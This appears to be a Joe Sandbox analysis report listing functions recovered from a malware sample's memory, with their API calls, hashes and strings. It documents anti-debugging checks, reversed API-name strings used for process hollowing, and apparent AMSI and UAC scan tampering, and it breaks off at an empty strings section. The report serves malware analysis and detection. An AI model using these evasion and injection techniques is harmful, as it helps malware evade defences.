KernelBase, xrefs: 02B2F74F

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
Instruction ID: 362bd32dab411d132a2f7e16cf33f8bd7dadee8321ae1eea48ff71547cdee55a
Opcode Fuzzy Hash: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
Instruction Fuzzy Hash: B4F0A770904358BAEB11A6B888887ECFBB99B05328F6447D0A439625E1E7710648CA51

Function 02B2DD70 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25

Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
Instruction ID: cb33507f0371fe68966ae60c1350d619d561fbe3f02e67a5a19d6daea7cbe546
Opcode Fuzzy Hash: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
Instruction Fuzzy Hash: F821E071A50319BAEB11EBD4CC56FDE77BDEB48700F5044A5B304F7180DA74AA048B64

Function 02B2E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6

Strings

ScanBuffer, xrefs: 02B2E53F
Initialize, xrefs: 02B2E4E6
OpenSession, xrefs: 02B2E598

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
Instruction ID: 28ddd1e5e8056753ebbe205609be8432b399c9c2c0731bab44ad2b1bc0701bb1
Opcode Fuzzy Hash: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
Instruction Fuzzy Hash: CD413975B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55

Function 02B2DC8C Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
Instruction ID: f136d701f76cf2452534bb099dad970d2e84d65eb49685b700266cf4fc268102
Opcode Fuzzy Hash: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
Instruction Fuzzy Hash: 9321E071A40319BEEB10EBA0DD56FDEB7BDEB04B00F5144A1B604F71D0DBB4AA048A64

Function 02B28788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814

Strings

Kernel32, xrefs: 02B287D3
CreateProcessAsUserW, xrefs: 02B287A1

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
Instruction ID: b4156115f14dee8d39c35aa82bb7842d7eaaf1645aaf0c428994067ac26b9ea6
Opcode Fuzzy Hash: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
Instruction Fuzzy Hash: 9211E5B2654258AFEB40EFA8DD41F9A77EDEB0C740F5144A0FA08D7250C634FD159B25

Function 02B27A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02B27A47
ntdll, xrefs: 02B27A74

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
Instruction ID: d23e4f91fa0960da7e273cc3fe5a9162521a241682b36118c561ac0a532a118c
Opcode Fuzzy Hash: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
Instruction Fuzzy Hash: A1116DB5654308BFEB00EFA4DC41EAEB7FDEB49710F9084A0F904D7250DA30AA049B69

Function 02B27A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02B27A47
ntdll, xrefs: 02B27A74

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
Instruction ID: 8388146c6a95389dc2769de29c0f941351b9eb95c78c470c125d64e1f822c128
Opcode Fuzzy Hash: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
Instruction Fuzzy Hash: 9D116DB5654308BFEB00EFA4DC41E9EB7FDEB49710F9084A0F904D7250DA30AA049B69

Function 02B28400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471

Strings

ntdll, xrefs: 02B28448
yromeMlautriVdaeRtN, xrefs: 02B2841B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
Instruction ID: 4416821152efddc7df5757196051053e39fe12a0bcaf38e925373375cc6836f0
Opcode Fuzzy Hash: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
Instruction Fuzzy Hash: 5E0140B5644318BFEB00EFA4DC41E9AB7FDEB4D700F9184A0F908D7650DA34A9159B64

Function 02B27D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC

Strings

yromeMlautriVetirW, xrefs: 02B27D93
Ntdll, xrefs: 02B27DC3

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
Instruction ID: ddbd965f134c26a55d869f5fea77957af354fd61dad7dd9a68ceb4cbc746443f
Opcode Fuzzy Hash: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
Instruction Fuzzy Hash: 14012DB5654314AFDB00EFA8DC41E5AB7EDEB49700F908890B908D7650DA30AD159B75

Function 02B28670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5

Strings

ntdll, xrefs: 02B286B8
noitceSfOweiVpamnUtN, xrefs: 02B2868B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
Instruction ID: 49158d26d9311c15c17309da22fd1708ef641e0c56c2a26098a1afc479a9023a
Opcode Fuzzy Hash: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
Instruction Fuzzy Hash: C201A2B4A44304AFEB00EFA4DC41E5EB7FEEB48740F9084E0F40497610DA34A905DA24

Function 02B2DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
Instruction ID: 7e57c1e19183b966585c856fc1901b44e08328d363bdf6be433c6ecf41e8b3b6
Opcode Fuzzy Hash: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
Instruction Fuzzy Hash: 4C01A275A4430A6EEB05DBA08D55FCD77B9AB44304F5005D29204E6081DAB4AB088B24

Function 02B2DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E

RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61

Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
Instruction ID: af9d69ab82114b9e8ef285d9bb1cec7df01d799a0ad4891b53d89aa00e2aabc6
Opcode Fuzzy Hash: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
Instruction Fuzzy Hash: A701F47194030DBEEB11EBA0DD56FCDB3BDEB48700F9145E1E605E6590EA74AB088A64

Function 02B26DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02B26D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99

CoCreateInstance.OLE32(?,00000000,00000005,02B26EAC,00000000,00000000,02B26E2B,?,00000000,02B26E9B), ref: 02B26E17

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
Instruction ID: 65ce6676ed6112fabea7441798b2c83f6ccd0f2f1b98e0c1ec686466d75e23e9
Opcode Fuzzy Hash: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
Instruction Fuzzy Hash: 9B01F231608708AEF711EF61DC6296FBBBDE749B00B9108B5F409E2690EA309D14C964

Function 02B2F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02B3B784,?,?,?,00000000,00000000), ref: 02B2F801

Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA

Part of subcall function 02B2F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
Part of subcall function 02B2F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700

Part of subcall function 02B2F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
Part of subcall function 02B2F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
Part of subcall function 02B2F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D

Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67

Part of subcall function 02B1C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C8B8B8,?,02B30751,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession), ref: 02B1C37B

Part of subcall function 02B2DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
Part of subcall function 02B2DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
Part of subcall function 02B2DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
Part of subcall function 02B2DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
Part of subcall function 02B2DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25

Part of subcall function 02B17E80: GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B

Part of subcall function 02B18048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B3370D,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8), ref: 02B18055

Strings

